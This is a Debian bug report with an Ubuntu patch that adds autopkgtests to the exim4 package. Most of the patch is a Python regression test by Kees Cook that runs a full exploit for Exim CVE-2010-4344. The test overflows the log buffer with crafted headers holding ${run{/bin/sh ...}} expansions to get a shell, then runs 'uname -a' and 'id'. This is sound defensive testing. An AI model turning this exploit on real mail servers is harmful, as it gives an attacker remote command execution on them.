Package: exim4 Version: 4.80-7 Severity: wishlist Tags: patch User: yolanda.ro...@canonical.com Usertags: origin-ubuntu ubuntu-patch
Added autopkgtests *** /tmp/tmpz3RT9w/bug_body In Ubuntu, the attached patch was applied to achieve the following: Improve QA of packages * d/tests: added dep-8-tests Thanks for considering the patch. -- System Information: Debian Release: wheezy/sid APT prefers saucy-updates APT policy: (500, 'saucy-updates'), (500, 'saucy-security'), (500, 'saucy') Architecture: amd64 (x86_64) Kernel: Linux 3.8.0-14-generic (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash
=== modified file 'debian/changelog' === modified file 'debian/control' --- debian/control 2012-11-11 07:11:06 +0000 +++ debian/control 2013-05-27 14:09:21 +0000 @@ -13,6 +13,7 @@ libident-dev, libdb5.1-dev, libxmu-dev, libxt-dev, libxext-dev, libx11-dev, libxaw7-dev, libpq-dev, libmysqlclient-dev | libmysqlclient15-dev, libsqlite3-dev, libperl-dev, libgnutls-dev, libsasl2-dev +XS-Testsuite: autopkgtest Package: exim4-base Architecture: any === added directory 'debian/tests' === added file 'debian/tests/CVE-2010-4344.py' --- debian/tests/CVE-2010-4344.py 1970-01-01 00:00:00 +0000 +++ debian/tests/CVE-2010-4344.py 2013-05-27 14:08:55 +0000 @@ -0,0 +1,141 @@ +#!/usr/bin/env python +# Copyright 2010, Canonical, Ltd. +# Author: Kees Cook <k...@ubuntu.com> +import socket, sys + +HOST = sys.argv[1] +PORT = 25 + +try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +except socket.error, msg: + sys.stderr.write("[ERROR] %s\n" % msg[1]) + sys.exit(1) + +try: + sock.settimeout(10) + sock.connect((HOST, PORT)) +except socket.error, msg: + sys.stderr.write("[ERROR] %s\n" % msg[1]) + sys.exit(2) + +def want(value, cmd=None): + if cmd != None: + sys.stdout.write("%s\n" % (cmd)) + sock.send("%s\n" % (cmd)) + data = sock.recv(1024) + sys.stdout.write(data) + final = data.splitlines().pop() + if not final.startswith('%d ' % (value)): + sys.stdout.write("*** Got '%s', wanted '%d' ***\n" % (final, value)) + sys.exit(5) + return data + +mail_from = '<root@localhost>' +rcpt_to = '<postmaster@localhost>' +helo = 'example.com' + +want(220) +data = want(250, "EHLO %s" % (helo)) +ident = data.splitlines()[0].split() +# Extract DNS details from helo response +sending_host = '%s (%s) %s' % (ident[2], helo, ident[3]) + +want(250, "MAIL FROM:%s" % (mail_from)) +want(250, "RCPT TO:%s" % (rcpt_to)) +want(354, "DATA") + +# want to fill up to LOG_BUFFER_SIZE - 3 (%c %s) == 8192 - 3 == 8189 +# and minus the logging header... +target = 8189 +sent = len('''2010-12-10 11:48:15 1PR8wt-00063W-Sb rejected from %s H=%s: message too big: read=72108293 max=52428800 +Envelope-from: %s +Envelope-to: %s +''' % (mail_from, sending_host, mail_from, rcpt_to)) +send = target - sent +count = 0 +padding = 3 # because of logging's " " prefix and "\n" suffix +taunt = 'M4iLB0mb' +header = 'MAILbombhdr%04d: ' +chunksize = len(header) + 120 +amount = send +while amount > chunksize: + prev = amount + amount /= 2 +chunksize = prev +chunksize = 100 +#print "Chunk size: %d" % (chunksize) + +#print "hit enter to continue" +#sys.stdin.readline() + +while send > 0: + count += 1 + #print "At position %d (%d to go)" % (sent, send) + data = header % (count) + perline = chunksize - padding + data += taunt * chunksize + + # Down-regulate + togo = send - padding + if togo > perline: + togo = perline + # Fill hole for easier forward calculations + left = sent % 100 + if left != 0: + left = 100 - left + if left < len(header) + (padding * 2): + left += 100 + togo = left - padding + data = data[0:togo] + + sock.send('%s\n' % (data)) + send -= len(data) + padding + sent += len(data) + padding + #print "(header %d) Wrote %d, consumed %d, at position %d (%d to go)" % (count, len(data), len(data) + padding, sent, send) + +# This header will expand past the logging buffer +sys.stdout.write("Sending exploit header\n") +sock.send('HeaderX: ') +for j in range(50): + for i in range(3, 13): + sock.send("${run{/bin/sh -c 'exec /bin/sh -i <&%d >&0 2>&0'}}" % i) +sock.send("\n"); + +# Now trigger the "message too large" handler +sys.stdout.write("Sending body to trigger reject\n") +sock.send("\n"); +for i in range(700000): + sock.send(taunt * 10 + "\n") +sock.send(".\n") + +want(552) +sock.settimeout(1) +trigger = "MAIL FROM:%s\n" % (mail_from) +sys.stdout.write(trigger) +sock.send(trigger) + +final = "" +shell = False +hit = False +while True: + try: + data = sock.recv(1024) + except: + break + sys.stdout.write(data) + sys.stdout.flush() + final += data + if '/bin/sh' in final: + shell = True + if shell and not hit: + sock.send("uname -a\n") + sock.send("id\n") + hit = True + +sock.close() +if shell: + print "\nSystem is vulnerable" + sys.exit(1) +print "\nSystem appears safe" +sys.exit(0) === added file 'debian/tests/control' --- debian/tests/control 1970-01-01 00:00:00 +0000 +++ debian/tests/control 2013-05-27 14:08:55 +0000 @@ -0,0 +1,3 @@ +Tests: daemon security +Depends: exim4 +Restrictions: needs-root === added file 'debian/tests/daemon' --- debian/tests/daemon 1970-01-01 00:00:00 +0000 +++ debian/tests/daemon 2013-05-27 14:08:55 +0000 @@ -0,0 +1,13 @@ +#!/bin/bash +#-------------- +# Testing exim4 +#-------------- +set -e +DAEMON=exim4 + +if pidof -x $DAEMON > /dev/null; then + echo "OK" +else + echo "ERROR: ${DAEMON} IS NOT RUNNING" + exit 1 +fi === added file 'debian/tests/security' --- debian/tests/security 1970-01-01 00:00:00 +0000 +++ debian/tests/security 2013-05-27 14:08:55 +0000 @@ -0,0 +1,6 @@ +#!/bin/bash +#---------------------- +# Testing exim security +#---------------------- +set -e +python `dirname $0`/CVE-2010-4344.py localhost 2>&1